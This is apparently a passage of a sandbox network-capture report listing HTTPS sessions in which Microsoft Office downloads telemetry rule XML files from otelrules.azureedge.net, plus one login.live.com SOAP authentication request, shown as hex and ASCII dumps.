2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 1c14dce3-c01e-0079-04d5-33e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968swgbqhC1EWRmnb400000005u0000000004un4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.5	49983	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 1c14dccd-c01e-0079-70d5-33e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968ljs8phC1EWRe6en00000005c000000000kuuf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.5	49973	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 9a2be917-a01e-0053-13d5-338603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968j6t2phC1EWRcfe800000005t0000000007paz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.5	49974	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 1815edcd-001e-0028-0ed5-33c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968j6t2phC1EWRcfe800000005t0000000007pb0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.5	49977	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: c08ebcd4-401e-0064-18d5-3354af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968jrjrxhC1EWRmmrs00000005rg00000000c63s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	49987	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-11 23:06:34 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-11 23:06:35 UTC	653	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 11 Nov 2024 23:05:34 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C539_SN1 x-ms-request-id: fb65f104-fa6b-4597-aeca-cf52b9d0e1a4 PPServer: PPV: 30 H: SN1PEPF0002F95D V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 23:06:34 GMT Connection: close Content-Length: 11391
2024-11-11 23:06:35 UTC	11391	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.5	49989	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 31c5e564-101e-008d-76d5-3392e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968qj8jrhC1EWRh41s00000005f000000000kmka x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.5	49990	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 5ac3f5ac-801e-008f-14d5-332c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968ljs8phC1EWRe6en00000005e000000000b9wh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.5	49992	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 1c14ddc0-c01e-0079-51d5-33e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968nnm4mhC1EWR1rn400000005gg00000000fzsd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.5	49993	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 3ca8c4c6-201e-0096-0fd5-33ace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968qj8jrhC1EWRh41s00000005f000000000kmkd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.5	49991	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:34 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 55c09f61-d01e-0082-16d5-33e489000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230634Z-174f7845968pf68xhC1EWRr4h800000005t000000000k16k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:34 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	49988	20.189.173.13	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
